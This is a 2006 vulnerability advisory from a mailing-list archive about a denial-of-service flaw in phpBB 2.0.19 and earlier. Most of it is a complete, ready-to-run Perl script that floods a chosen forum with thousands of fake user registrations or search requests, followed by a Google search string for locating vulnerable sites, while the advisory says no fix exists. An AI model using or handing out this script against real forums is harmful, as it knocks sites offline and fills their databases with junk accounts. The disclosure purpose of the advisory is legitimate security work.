<<< Date Index >>>     <<< Thread Index >>>

HYSA-2006-001 phpBB 2.0.19 search.php and profile.php DOS Vulnerability



------------------------------------------------------ 
      HYSA-2006-001 h4cky0u.org Advisory 010 
------------------------------------------------------ 
Date - Wed Jan 25 2006 



TITLE: 
====== 


phpBB 2.0.19 search.php and profile.php DOS Vulnerability 



SEVERITY: 
========= 


High 



SOFTWARE: 
========= 


phpBB 2.0.19 and prior 



INFO: 
===== 


phpBB is a high powered, fully scalable, and highly customizable 
Open Source bulletin board package. phpBB has a user-friendly 
interface, simple and straightforward administration panel, and 
helpful FAQ. Based on the powerful PHP server language and your 
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, 
phpBB is the ideal free community solution for all web sites. 


Support Website : http://www.phpbb.com 



BUG DESCRIPTION: 
================ 


The bug was originally found by HaCkZaTaN of NeoSecurityteam. The 
original exploit code can be found at - 


http://h4cky0u.org/viewtopic.php?t=637 


This one affected only versions uptill phpBB 2.0.15. The exploit code 
has been recoded which affects the latest version too. The bug resides 
in the following two scripts- 


profile.php << By registering as many users as you can. 
search.php << By searching in a way that the db cannot understand. 



Proof Of Concept Code: 
====================== 


#!/usr/bin/perl 
####################################### 
## Recoded by: mix2mix and Elioni of http://ahg-khf.org 
## And h4cky0u Security Forums (http://h4cky0u.org) 
## Name: phpBBDoSReloaded 
## Original Author: HaCkZaTaN of Neo Security Team 
## Tested on phpBB 2.0.19 and earlier versions 
## Ported to perl by g30rg3_x 
## Date: 25/01/06 
####################################### 
use IO::Socket; 


## Initialized X 
$x = 0; 


print q( 
  phpBBDosReloaded - Originally NsT-phpBB DoS by HaCkZaTaN 
  Recoded by Albanian Hackers Group & 
  h4cky0u Security Forums 


); 
print q(Host |without-> http://www.| ); 
$host = <STDIN>; 
chop ($host); 


print q(Path |example-> /phpBB2/ or /| ); 
$pth = <STDIN>; 
chop ($pth); 


print q(Flood Type |1 = If Visual Confirmation is disabled, 2 = If 
Visual Confirmation is enabled| ); 
$type = <STDIN>; 
chop ($type); 


## Tipi për regjistrim 
if($type == 1){ 


## User Loop for 9999 loops (enough for Flood xDDDD) 
while($x != 9999) 
{ 


## Antari që regjistrohet automatikishtë "X" 
$uname = "username=AHG__" . "$x"; 


## Emaili që regjistrohet ne bazën "X" 
$umail = "&email=AHG__" . "$x"; 


$postit = 
"$uname"."$umail"."%40ahg-crew.org&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit";
 


$lrg = length $postit; 


my $sock = new IO::Socket::INET ( 
                                 PeerAddr => "$host", 
                                 PeerPort => "80", 
                                 Proto => "tcp", 
                                ); 
die "\nNuk mundem te lidhemi me hostin sepse ësht dosirat ose nuk 
egziston: $!\n" unless $sock; 


## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums 
print $sock "POST $pth"."profile.php HTTP/1.1\n"; 
print $sock "Host: $host\n"; 
print $sock "Accept: image/gif, image/x-xbitmap, image/jpeg, 
image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, 
application/vnd.ms-powerpoint, application/msword, */*\n"; 
print $sock "Referer: $host\n"; 
print $sock "Accept-Language: en-us\n"; 
print $sock "Content-Type: application/x-www-form-urlencoded\n"; 
print $sock "Accept-Encoding: gzip, deflate\n"; 
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; 
rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; 
print $sock "Connection: Keep-Alive\n"; 
print $sock "Cache-Control: no-cache\n"; 
print $sock "Content-Length: $lrg\n\n"; 
print $sock "$postit\n"; 
close($sock); 


## Print a "+" for every loop 
syswrite STDOUT, "+"; 


$x++; 
} 


## Tipi 2-shë për Kërkim(Flood) 
} 
elsif ($type == 2){ 


while($x != 9999) 
{ 
## Final Search String to Send 
$postit = 
"search_keywords=Albanian+Hackers+Group+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";
 


## Posit Length 
$lrg = length $postit; 


## Connect Socket with Variables Provided By User 
my $sock = new IO::Socket::INET ( 
                                 PeerAddr => "$host", 
                                 PeerPort => "80", 
                                 Proto => "tcp", 
                                ); 
die "\nThe Socket Can't Connect To The Desired Host or the Host is 
MayBe DoSed: $!\n" unless $sock; 


## Sending Truth Socket The HTTP Commands For Send A BD Search Into 
phpBB Forums 
print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n"; 
print $sock "Host: $host\n"; 
print $sock "Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
 
print $sock "Referer: $host\n"; 
print $sock "Accept-Language: en-us\n"; 
print $sock "Content-Type: application/x-www-form-urlencoded\n"; 
print $sock "Accept-Encoding: gzip, deflate\n"; 
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; 
rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n"; 
print $sock "Connection: Keep-Alive\n"; 
print $sock "Cache-Control: no-cache\n"; 
print $sock "Content-Length: $lrg\n\n"; 
print $sock "$postit\n"; 
close($sock); 


## Print a "+" for every loop 
syswrite STDOUT, "+"; 


## Increment X in One for every Loop 
$x++; 
} 
}else{ 
## STF??? Qfarë keni Shtypur 
   die "Mundësia nuk Lejohet +_-???\n"; 
} 



FIX: 
==== 


No fix available as of date. 



GOOGLEDORK: 
=========== 


"Powered by phpBB" 



CREDITS: 
======== 


- This vulnerability was discovered and researched by HaCkZaTaN of 
NeoSecurityteam. 



- Exploit recoded by mix2mix of [AHG-KHF] Security Team for the latest 
release of the script - 


Web : http://ahg-khf.org 


mail : webmaster at ahg-khf dot org 



- Co Researcher - 


h4cky0u of h4cky0u Security Forums. 


mail : h4cky0u at gmail dot com 


web : http://www.h4cky0u.org 



ORIGINAL ADVISORY: 
================== 


http://www.h4cky0u.org/advisories/HYSA-2006-001-phpbb.txt 


-- 
http://www.h4cky0u.org 
(In)Security at its best...